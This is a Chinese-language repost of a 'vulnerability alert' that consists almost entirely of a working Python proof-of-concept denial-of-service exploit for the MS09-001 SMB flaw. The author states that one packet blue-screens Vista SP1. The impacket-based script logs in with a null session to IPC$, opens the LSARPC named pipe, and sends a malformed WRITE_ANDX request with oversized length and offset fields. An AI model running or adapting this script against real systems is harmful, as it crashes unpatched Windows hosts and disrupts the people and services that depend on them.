MS09001 SMB Dos Poc Exploit漏洞预警 -电脑资料

    今天用python写了一个SMB dos的poc，测试vista sp1，

    一个包过去立刻蓝屏，不过XP SP2不行，因为XP SP2下面默认不允许空会话访问lsarpc,samr等命名管道，

MS09001 SMB Dos Poc Exploit漏洞预警

    # MS09-001 SMB Dos Vulnerabilities Poc Exploit

    # Author : vessial

    # http://hi.baidu.com/vessial

    # Tod

    # [+] test vista sp1,system BOSD

    # Reference :http://www.microsoft.com/technet/security/Bulletin/MS09-001.mspx

    #                http://www.milw0rm.com/exploits/6463

    import impacket

    from impacket import smb

    from impacket import nmb

    remote = smb.SMBPacket('')

    r = smb.SMB('*SMBSERVER','192.168.40.129',None,nmb.TYPE_SERVER,445)

    r._login('','','','WORKGROUP')

    tid = r.tree_connect_andx('\\\\192.168.40.129\\IPC$')

    smb1 = smb.NewSMBPacket()

    smb1['Flags1'] = 0x18

    smb1['Flags2'] = 0xc807

    smb1['Tid']   = tid

    ntCreate = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX)

    ntCreate['Parameters'] = smb.SMBNtCreateAndX_Parameters()

    ntCreate['Data']      = smb.SMBNtCreateAndX_Data()

    ntCreate['Parameters']['FileNameLength'] = 14

    ntCreate['Parameters']['AndXOffset'] = 0xdede

    ntCreate['Parameters']['CreateFlags'] = 0x16

    ntCreate['Parameters']['AccessMask'] = 0x2019f

    ntCreate['Parameters']['CreateOptions'] = 0x400040

    ntCreate['Parameters']['ShareAccess'] = 7

    ntCreate['Parameters']['Impersonation'] = 2

    ntCreate['Parameters']['Disposition'] = 1

    ntCreate['Data'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00"

    smb1.addCommand(ntCreate)

    r.sendSMB(smb1)

    recv=r.recvSMB()

    if recv.isValidAnswer(smb.SMB.SMB_COM_NT_CREATE_ANDX):

    ntCreateResponse = smb.SMBCommand(recv['Data'][0])

    ntCreateParameters =smb.SMBNtCreateAndXResponse_Parameters(ntCreateResponse['Parameters'])

    fid = ntCreateParameters['Fid']

    smb1 = smb.NewSMBPacket()

    smb1['Flags1'] = 0x18

    smb1['Flags2'] = 0

    smb1['Tid']   = tid

    data = "A"*72

    writeAndX = smb.SMBCommand(smb.SMB.SMB_COM_WRITE_ANDX)

    smb1.addCommand(writeAndX)

    writeAndX['Parameters'] = smb.SMBWriteAndX_Parameters()

    writeAndX['Parameters']['Fid'] = fid

    writeAndX['Parameters']['AndXOffset'] = 0xdede

    writeAndX['Parameters']['Offset'] = 0

    writeAndX['Parameters']['WriteMode'] = 8

    writeAndX['Parameters']['Remaining'] = len(data)

    writeAndX['Parameters']['_reserved'] = -1

    writeAndX['Parameters']['DataLength'] = 0xffff

    writeAndX['Parameters']['DataOffset'] = 0xffff

    writeAndX['Parameters']['HighOffset'] = 0xcccccccc

    writeAndX['Data'] = data

    r.sendSMB(smb1)